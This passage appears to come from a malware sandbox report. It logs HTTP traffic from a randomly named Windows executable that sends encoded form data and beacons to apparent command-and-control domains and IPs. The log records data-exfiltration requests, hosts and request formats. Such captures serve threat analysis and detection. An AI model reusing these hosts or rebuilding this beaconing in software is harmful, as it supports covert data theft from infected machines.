41	192.168.2.6	62425	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:23.258460999 CEST	741	OUT	POST /5egn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.dkimhub.com Origin: http://www.dkimhub.com Referer: http://www.dkimhub.com/5egn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 47 51 54 2b 33 4f 44 76 33 43 65 33 34 68 74 74 45 59 58 58 6f 46 6d 7a 74 6c 70 4e 4e 79 46 6c 6b 66 50 53 4e 52 45 76 56 34 45 79 62 74 71 62 4d 65 78 36 45 31 32 71 61 31 77 43 56 4a 45 63 55 71 73 49 43 65 55 72 6e 75 76 54 74 37 61 75 30 62 6b 4c 35 33 4e 76 69 4d 30 44 33 53 48 39 77 56 56 55 35 50 31 52 48 47 63 69 48 36 30 42 7a 5a 5a 65 76 56 38 78 36 4d 6a 4d 68 55 42 6b 61 48 2b 39 75 59 6a 51 2b 31 42 6d 70 63 36 31 71 54 52 63 44 38 78 54 6c 6f 30 56 4c 2b 4e 38 78 72 42 38 6a 54 76 59 50 71 54 72 56 38 6d 69 39 2f 32 66 37 71 56 39 2f 33 2f 54 4d 39 44 57 48 6e 35 49 68 71 43 69 46 6f 45 79 Data Ascii: 9Fjx=GQT+3ODv3Ce34httEYXXoFmztlpNNyFlkfPSNREvV4EybtqbMex6E12qa1wCVJEcUqsICeUrnuvTt7au0bkL53NviM0D3SH9wVVU5P1RHGciH60BzZZevV8x6MjMhUBkaH+9uYjQ+1Bmpc61qTRcD8xTlo0VL+N8xrB8jTvYPqTrV8mi9/2f7qV9/3/TM9DWHn5IhqCiFoEy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	62426	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:25.824462891 CEST	765	OUT	POST /5egn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.dkimhub.com Origin: http://www.dkimhub.com Referer: http://www.dkimhub.com/5egn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 47 51 54 2b 33 4f 44 76 33 43 65 33 34 42 64 74 58 50 44 58 71 6c 6d 30 75 6c 70 4e 43 53 46 66 6b 66 44 53 4e 56 30 2f 55 4d 6f 79 62 4d 61 62 65 4b 6c 36 46 31 32 71 56 56 77 48 52 4a 46 53 55 71 68 72 43 66 6f 72 6e 75 37 54 74 35 53 75 30 6f 4d 45 35 6e 4e 58 35 38 30 42 71 69 48 39 77 56 56 55 35 4c 63 45 48 47 45 69 48 4a 38 42 68 37 78 64 70 6c 38 2b 37 4d 6a 4d 77 6b 42 67 61 48 2b 55 75 64 37 36 2b 33 35 6d 70 65 69 31 71 43 52 66 59 4d 78 52 34 59 30 42 4c 4d 63 32 36 72 4d 39 71 41 54 69 62 70 6a 4b 64 71 6e 34 68 4d 32 38 70 36 31 2f 2f 31 6e 68 4d 64 44 38 46 6e 42 49 7a 39 4f 46 4b 63 68 52 79 75 6d 6c 36 6c 6e 6b 70 47 67 42 6c 31 45 31 2b 51 30 41 72 67 3d 3d Data Ascii: 9Fjx=GQT+3ODv3Ce34BdtXPDXqlm0ulpNCSFfkfDSNV0/UMoybMabeKl6F12qVVwHRJFSUqhrCfornu7Tt5Su0oME5nNX580BqiH9wVVU5LcEHGEiHJ8Bh7xdpl8+7MjMwkBgaH+Uud76+35mpei1qCRfYMxR4Y0BLMc26rM9qATibpjKdqn4hM28p61//1nhMdD8FnBIz9OFKchRyuml6lnkpGgBl1E1+Q0Arg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	62427	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:28.407743931 CEST	1778	OUT	POST /5egn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.dkimhub.com Origin: http://www.dkimhub.com Referer: http://www.dkimhub.com/5egn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 47 51 54 2b 33 4f 44 76 33 43 65 33 34 42 64 74 58 50 44 58 71 6c 6d 30 75 6c 70 4e 43 53 46 66 6b 66 44 53 4e 56 30 2f 55 4d 67 79 62 2b 69 62 4d 39 4a 36 43 31 32 71 4c 6c 77 47 52 4a 45 4f 55 72 4a 33 43 66 6c 55 6e 6f 2f 54 38 73 47 75 39 35 4d 45 71 48 4e 58 6d 4d 30 41 33 53 48 53 77 55 6c 71 35 50 77 45 48 47 45 69 48 4f 4d 42 33 5a 5a 64 79 6c 38 78 36 4d 6a 51 68 55 42 45 61 44 53 75 75 64 50 41 2b 44 4e 6d 75 2b 79 31 6d 51 35 66 46 38 78 50 35 59 31 47 4c 4d 51 31 36 72 51 62 71 42 6e 45 62 71 2f 4b 65 38 32 38 37 50 32 6f 71 70 5a 46 6f 79 54 65 45 37 79 43 66 58 78 72 34 76 79 47 45 38 35 64 37 4c 75 73 76 6e 32 49 67 47 55 72 69 43 35 39 2f 69 70 31 37 2b 42 55 4b 73 33 50 78 61 70 6f 33 58 50 4d 55 61 69 54 73 76 68 37 77 34 38 4a 76 35 75 30 49 6a 6b 52 44 38 49 63 59 37 37 56 56 42 6b 37 63 42 5a 54 30 37 5a 6d 67 6b 54 33 55 48 53 48 6c 2f 32 75 2b 51 4d 6b 6b 4c 41 77 37 38 51 57 69 4a 73 69 72 72 69 70 63 30 58 63 56 6b 37 42 30 45 4e 6c 46 51 75 70 61 56 71 4c 74 [TRUNCATED] Data Ascii: 9Fjx=GQT+3ODv3Ce34BdtXPDXqlm0ulpNCSFfkfDSNV0/UMgyb+ibM9J6C12qLlwGRJEOUrJ3CflUno/T8sGu95MEqHNXmM0A3SHSwUlq5PwEHGEiHOMB3ZZdyl8x6MjQhUBEaDSuudPA+DNmu+y1mQ5fF8xP5Y1GLMQ16rQbqBnEbq/Ke8287P2oqpZFoyTeE7yCfXxr4vyGE85d7Lusvn2IgGUriC59/ip17+BUKs3Pxapo3XPMUaiTsvh7w48Jv5u0IjkRD8IcY77VVBk7cBZT07ZmgkT3UHSHl/2u+QMkkLAw78QWiJsirripc0XcVk7B0ENlFQupaVqLtAPDs7ZqRQOt2HgRw2lgvZUyRrWXR5o2QYEl8uIEtUnkZc6pf2mM48sTq6q7v6lVHVpCcYwGwrsvOG86T6BbmCYY0AR0xR9vraG4EsBdp/n+cCc+DcrPfYQMgWA7cUgv8gjibdCd+w6wFJ9OkSA3y4DW/f0axW0+6HH2vjHOlnH/24kLtHMg/lyW4kvQ7cQdCcbHKsZyn1vsgPnknEwzcyGkR9Z0yLoKf5WWvhiK0omK3fo/KGqf8TLT/Han2pwmhskiJrOZ30PhZrva2xmXCGAvz6emKveq7MliBTygJzEunGWGTWynkI8+1AygrM9kiccOwlUnLrBLd8UolSWnbMa2cdvFxZqdXsJAyDoNdXRjvJxYRlZEjYhtgKo+1lLR1IHFraU3l3Q1i7O1ZPOWb82ytQY3+/102aeDWQFGkhmY7yJUHw/uNC0jR7/aHsKgH+Cx5bbQtz9bg4VRfZ8ja7V3d3HSQbd7VxyM7iX6dEf/Xhi3da8gRPeLwZjU8lmEUiDC3XX4srXvzg924aI52e6ZfVmuYttWZKV0VmJkCyrT5mBJLpXTLPOZ4t1cP8RHSLVk5xuWdQ8MXcWIe1UnHpW2REJPZ+YS/A2oLRwkDkK0A4xqIfMBAGvYDNIViGQG9AoOTaU7aCYAksMnhfVIybkyYk2iEHfy/Bt [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	62428	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:30.984030008 CEST	483	OUT	GET /5egn/?9Fjx=LS7e07ng+gHNsyJARIPtuVi+lEkqNBJQ2ublElNdV5gzbr2xH6h/El6SaWwjRr8Uba16H88ExuT+84ut878T3wBrsvgB0imO00p96tUlW1EzL/ongopUwV5X18HPxTdgNiqUy4Q=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.dkimhub.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	62429	172.191.244.62	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:36.725028038 CEST	747	OUT	POST /ixgj/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.xyz-store.xyz Origin: http://www.xyz-store.xyz Referer: http://www.xyz-store.xyz/ixgj/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 79 62 4c 61 57 66 44 2f 31 68 43 58 33 64 6b 65 64 48 54 69 46 6a 54 57 52 7a 53 4c 56 33 63 4f 72 62 6c 6a 57 78 61 68 72 57 70 72 79 75 44 6c 69 75 6f 6b 6b 68 35 62 39 57 2b 4a 65 55 6a 39 52 4f 54 4a 69 4d 4b 39 73 72 49 6f 51 66 78 54 74 56 48 7a 6d 76 47 6a 53 2f 72 36 32 71 6e 49 52 38 6b 55 4e 57 57 4c 52 6b 58 42 52 2f 37 6c 4b 74 78 36 6a 74 44 45 47 56 68 6d 34 51 62 75 55 52 2b 2b 61 70 53 64 36 34 44 64 2b 77 61 2f 4d 62 58 2f 37 32 48 58 46 61 42 32 78 70 36 6d 57 4c 47 46 45 59 33 66 76 55 67 56 2b 58 75 49 76 62 4d 4c 78 32 61 74 4d 6a 5a 39 54 36 79 33 6e 79 55 45 41 37 4a 65 61 7a 66 4b Data Ascii: 9Fjx=ybLaWfD/1hCX3dkedHTiFjTWRzSLV3cOrbljWxahrWpryuDliuokkh5b9W+JeUj9ROTJiMK9srIoQfxTtVHzmvGjS/r62qnIR8kUNWWLRkXBR/7lKtx6jtDEGVhm4QbuUR++apSd64Dd+wa/MbX/72HXFaB2xp6mWLGFEY3fvUgV+XuIvbMLx2atMjZ9T6y3nyUEA7JeazfK
Jul 27, 2024 08:08:37.182348967 CEST	195	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sat, 27 Jul 2024 06:08:37 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	62430	172.191.244.62	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:39.292445898 CEST	771	OUT	POST /ixgj/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.xyz-store.xyz Origin: http://www.xyz-store.xyz Referer: http://www.xyz-store.xyz/ixgj/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 79 62 4c 61 57 66 44 2f 31 68 43 58 33 39 34 65 66 6b 4c 69 4a 54 54 58 4e 44 53 4c 66 58 63 56 72 62 35 6a 57 77 76 38 72 6b 64 72 78 4c 2f 6c 6a 72 49 6b 78 68 35 62 32 32 2b 4d 54 30 6a 32 52 4f 50 72 69 4a 71 39 73 6f 30 6f 51 61 4e 54 75 6d 2f 79 33 76 47 68 59 76 72 38 79 71 6e 49 52 38 6b 55 4e 57 44 44 52 67 37 42 57 50 72 6c 4c 4d 78 31 76 4e 44 48 57 31 68 6d 38 51 62 79 55 52 2f 62 61 6f 50 77 36 36 37 64 2b 78 71 2f 4d 4f 6a 38 31 32 48 52 4c 36 41 65 30 6f 54 55 50 34 65 43 4d 62 6a 67 33 55 51 79 37 68 76 53 7a 6f 4d 6f 6a 6d 36 76 4d 68 42 50 54 61 79 64 6c 79 73 45 53 73 46 35 56 48 36 70 47 78 7a 7a 7a 77 54 58 4b 46 34 70 4b 67 62 43 47 76 65 71 33 41 3d 3d Data Ascii: 9Fjx=ybLaWfD/1hCX394efkLiJTTXNDSLfXcVrb5jWwv8rkdrxL/ljrIkxh5b22+MT0j2ROPriJq9so0oQaNTum/y3vGhYvr8yqnIR8kUNWDDRg7BWPrlLMx1vNDHW1hm8QbyUR/baoPw667d+xq/MOj812HRL6Ae0oTUP4eCMbjg3UQy7hvSzoMojm6vMhBPTaydlysESsF5VH6pGxzzzwTXKF4pKgbCGveq3A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	62431	172.191.244.62	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:41.872615099 CEST	1784	OUT	POST /ixgj/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.xyz-store.xyz Origin: http://www.xyz-store.xyz Referer: http://www.xyz-store.xyz/ixgj/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 79 62 4c 61 57 66 44 2f 31 68 43 58 33 39 34 65 66 6b 4c 69 4a 54 54 58 4e 44 53 4c 66 58 63 56 72 62 35 6a 57 77 76 38 72 6b 46 72 79 35 48 6c 6a 4b 49 6b 33 52 35 62 2f 57 2b 4e 54 30 6a 52 52 4f 48 76 69 4a 75 74 73 74 34 6f 43 73 35 54 35 6e 2f 79 2b 76 47 68 57 2f 72 35 32 71 6e 6e 52 38 30 49 4e 57 54 44 52 67 37 42 57 4a 50 6c 62 74 78 31 74 4e 44 45 47 56 68 51 34 51 62 57 55 51 62 68 61 6f 4c 47 36 4b 62 64 2f 52 36 2f 41 63 37 38 71 6d 48 54 4b 4b 41 47 30 6f 50 50 50 37 37 37 4d 59 2f 4f 33 54 77 79 37 6e 32 56 72 6f 77 4e 37 48 43 50 56 43 68 32 56 2f 43 53 71 52 4e 6c 62 63 4a 31 65 47 53 65 48 6d 72 38 39 77 4f 4b 4c 33 64 4a 43 6c 6d 6c 56 64 47 36 73 69 50 54 4d 4d 77 65 69 79 5a 4f 39 43 78 63 78 69 52 59 39 32 38 51 6f 57 50 38 4a 53 67 52 49 64 41 56 48 31 32 49 2b 78 54 36 7a 72 78 42 4c 32 38 4d 4c 34 77 39 62 32 31 32 64 79 65 66 6e 54 47 39 44 35 78 6c 58 53 6d 4b 48 43 49 46 6e 4c 62 64 31 69 38 53 63 5a 4e 42 6b 4d 70 41 4a 52 61 6e 75 55 4d 68 65 44 63 4c 77 [TRUNCATED] Data Ascii: 9Fjx=ybLaWfD/1hCX394efkLiJTTXNDSLfXcVrb5jWwv8rkFry5HljKIk3R5b/W+NT0jRROHviJutst4oCs5T5n/y+vGhW/r52qnnR80INWTDRg7BWJPlbtx1tNDEGVhQ4QbWUQbhaoLG6Kbd/R6/Ac78qmHTKKAG0oPPP777MY/O3Twy7n2VrowN7HCPVCh2V/CSqRNlbcJ1eGSeHmr89wOKL3dJClmlVdG6siPTMMweiyZO9CxcxiRY928QoWP8JSgRIdAVH12I+xT6zrxBL28ML4w9b212dyefnTG9D5xlXSmKHCIFnLbd1i8ScZNBkMpAJRanuUMheDcLwglNo4H65SZe1r5DMPeVHdIePVA6NOYX8jtuN1iQrs2XCsKortX8UM2N1LEoYuWQidVPb0qqYWlUTBhA3fmRt5J/0RZ7+C6A1CtMyQBA4TqeFLGcaajp5Gc2z5SaHv1E38aTyi4qSZW5w/PDHnXi+C+ElbLC6G5IE+raDASYXmh9XWMvimLxHyrL17RKQQr93disjRyKgjlTSr8FxhnIwgyonsuMwXXKkTw3cC+SK2O4opJtYdIkN6ocJN30yVi1B8XSjiDBB39fVCisNEII2/dHTbi7Sm++GZWRxtZLJP5vthb3EuRrBTBM/gZxxnuo+Fgenu3C6k86P3Y/6RJPScjTC4FdATYgTSwV1jZHeXCcEsAqWXDcbto5ysblPvJCZhsIwzfIUFecAtIT6VzbrUvkJWmRRe+bCz1bzQBYy6Tp/polhLAttw+BPAcxdXyN/KD9Elg6lqoVrlss3RGDvTIjgEI4nIbIkeZ1ic66ofGRkEwm+qRCiRgxGAmWt/o0kgedkvMcUeU7r6R4PzJ0EnYVhD0nFxInFasEmkSzWZLBbbgVbBnIVOURCiHPaPvJpK2DkwmviLMubsfliIWJtm4LbDCn8yMkiGnp+dhVEQCl7jGqJKzkbjvvFiENksOgmqa9jGnJLV5TyDN8xtj3vDFs+gWUh3mKZpZ [TRUNCATED]
Jul 27, 2024 08:08:42.334685087 CEST	195	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sat, 27 Jul 2024 06:08:42 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	62432	172.191.244.62	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:44.443260908 CEST	485	OUT	GET /ixgj/?9Fjx=/Zj6VqX56ByDodokLRjPKDm3Pwn2S1h1h7pQZ2SgqDdN9OrisfEzogZ++nqPS1/BV9/5rcururFkQ+JMtWq084ODcNTM6ri6BugJHEDlWjTEcfv6bdNq3ciQP3N1zgfhFVTfb+g=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.xyz-store.xyz User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	62433	162.241.216.26	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:49.613475084 CEST	768	OUT	POST /pf6m/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.artistcalculator.com Origin: http://www.artistcalculator.com Referer: http://www.artistcalculator.com/pf6m/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 57 68 65 44 51 31 38 4e 5a 31 69 63 42 55 47 68 72 61 78 54 43 56 67 38 33 55 62 51 32 42 45 57 38 6a 70 75 54 2b 45 4c 67 68 39 49 48 39 43 31 42 41 52 36 35 56 74 70 57 4b 53 34 70 72 68 4d 55 62 32 33 57 46 58 45 6e 4e 57 4f 50 79 6f 2b 6b 71 6a 35 57 45 55 6c 51 4b 53 33 34 2b 54 2f 65 34 42 41 53 50 6e 55 6c 6b 54 71 77 50 76 4d 4e 70 57 52 4a 34 43 52 62 57 48 51 6e 52 49 75 78 72 4f 43 44 59 59 2b 71 53 6e 67 32 48 76 57 68 45 58 4e 4a 56 6a 6d 5a 63 77 69 34 59 30 6f 63 51 2b 6b 61 6a 6d 30 36 4a 73 70 62 4f 75 4e 54 71 65 58 4c 45 5a 65 52 4e 6a 4e 54 51 69 65 36 72 54 68 31 48 7a 58 44 67 35 66 Data Ascii: 9Fjx=WheDQ18NZ1icBUGhraxTCVg83UbQ2BEW8jpuT+ELgh9IH9C1BAR65VtpWKS4prhMUb23WFXEnNWOPyo+kqj5WEUlQKS34+T/e4BASPnUlkTqwPvMNpWRJ4CRbWHQnRIuxrOCDYY+qSng2HvWhEXNJVjmZcwi4Y0ocQ+kajm06JspbOuNTqeXLEZeRNjNTQie6rTh1HzXDg5f
Jul 27, 2024 08:08:50.381589890 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:08:50 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 1226 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d ae 7f 05 ab 62 7d 18 46 cb 49 da 61 70 64 07 59 36 6c 03 f6 51 20 1b 8a 3d 05 14 79 6d b1 a1 78 39 92 8a ec 0e fd ef bb 94 28 c7 69 da 01 6d 05 03 96 ee e7 b9 e7 9c ea e9 0f 7f 5c fd f9 f7 ab 1f 59 13 5b b3 9e 55 e9 8f 19 61 b7 ab 02 2c ff eb ba 58 cf 9e 54 0d 08 45 ff 4f aa 16 a2 60 56 b4 b0 2a ee 34 f4 0e 7d 2c 98 44 1b c1 c6 55 d1 6b 15 9b 95 82 3b 2d 81 0f 1f c5 fb 5d 1e 6b 8c e1 a8 c7 a2 b6 0a 76 df 30 8b 1b 34 06 fb 82 95 43 53 d4 d1 c0 fa d2 47 1d 22 bb 12 46 76 46 44 f4 ec 79 ab 44 68 ce d9 15 b6 da 6e d9 35 a2 ad ca b1 38 b5 05 e9 b5 8b 2c 78 b9 2a 9a 18 dd b2 2c c5 30 43 1e 46 cc 25 b6 65 ef b8 b6 d2 74 0a 42 f9 86 7e ff 74 e0 f7 f9 6f fe 26 14 eb aa 1c 47 8d 53 e3 de 00 8b 7b 47 27 44 d8 c5 52 06 2a f9 9a fd 3b 63 f4 d4 b8 e3 41 bf 25 38 4b 7a f7 0a 3c a7 d0 f9 90 e3 2d be e5 ff 5b d0 43 7d ab e3 47 6b de cd 66 35 aa fd b4 4a c8 db ad c7 ce 2a 2e d1 a0 5f b2 be d1 11 c6 51 39 52 1b 2a 1a 23 78 07 7e 43 a4 f2 dd 92 35 5a 29 b0 63 bc 15 [TRUNCATED] Data Ascii: R]o6}b}FIapdY6lQ =ymx9(im\Y[Ua,XTEO`V4},DUk;-]kv04CSG"FvFDyDhn58,x,0CF%etB~to&GS{G'DR;cA%8Kz<-[C}Gkf5J._Q9R#x~C5Z)c~-z/\^ ZN#d$?(%t!g1:m(~X5y,J?%WcNwb ['vm Y2F;PY=3Myh@#u+d-LX@dF([>r?F[i4I#$'/(g_,&>RAcxD&9;?W Q#vBVX:3TvR@<Z3iR&6ypB^QEo!.}vCX"nphbUe)JF%e$em:h02dSbz\pq:VQSRiXm44zUd$E>I
Jul 27, 2024 08:08:50.381607056 CEST	431	IN	Data Raw: ee c8 d9 d0 d5 41 7a ed 92 06 37 bd 56 5b 38 54 56 cd c9 fa 6a 80 c3 ae 09 ce 53 5a 7d 72 48 9d ae 2f d9 ef d0 b3 d7 74 ce ab 74 0e bb 26 e2 a9 e4 34 97 b0 bc ae 72 f7 40 d2 ac 74 d9 4d 22 36 14 eb 4a 1c 91 19 88 cd be ef e7 13 53 03 93 64 f6 6d Data Ascii: Az7V[8TVjSZ}rH/tt&4r@tM"6JSdm`O mImb6bO~x1's;m8q.+JTu#Z}Wb]d+Z(-<_to{3OA^H24,L=bA#zch

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	62434	162.241.216.26	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:52.185499907 CEST	792	OUT	POST /pf6m/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.artistcalculator.com Origin: http://www.artistcalculator.com Referer: http://www.artistcalculator.com/pf6m/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 57 68 65 44 51 31 38 4e 5a 31 69 63 41 30 32 68 6e 5a 5a 54 45 31 67 7a 79 55 62 51 2f 68 45 61 38 6a 6c 75 54 2f 41 62 67 56 52 49 48 66 4b 31 54 56 6c 36 34 56 74 70 4f 36 53 78 6b 4c 68 39 55 62 72 58 57 48 54 45 6e 4e 43 4f 50 7a 59 2b 6c 64 33 32 58 55 55 6e 45 36 53 35 38 2b 54 2f 65 34 42 41 53 50 43 37 6c 6b 4c 71 7a 2b 66 4d 4c 4e 43 57 58 49 43 53 50 47 48 51 30 42 49 71 78 72 50 56 44 5a 46 6c 71 51 76 67 32 48 66 57 67 56 58 53 44 56 6a 67 45 4d 78 50 35 61 41 34 65 54 76 37 46 54 32 31 75 4a 52 4e 61 34 76 58 50 5a 65 30 5a 55 35 63 52 50 37 2f 54 77 69 30 34 72 72 68 6e 51 2f 77 4d 55 63 38 6f 4b 78 32 71 45 62 58 70 5a 46 48 76 47 62 33 79 51 69 49 33 51 3d 3d Data Ascii: 9Fjx=WheDQ18NZ1icA02hnZZTE1gzyUbQ/hEa8jluT/AbgVRIHfK1TVl64VtpO6SxkLh9UbrXWHTEnNCOPzY+ld32XUUnE6S58+T/e4BASPC7lkLqz+fMLNCWXICSPGHQ0BIqxrPVDZFlqQvg2HfWgVXSDVjgEMxP5aA4eTv7FT21uJRNa4vXPZe0ZU5cRP7/Twi04rrhnQ/wMUc8oKx2qEbXpZFHvGb3yQiI3Q==
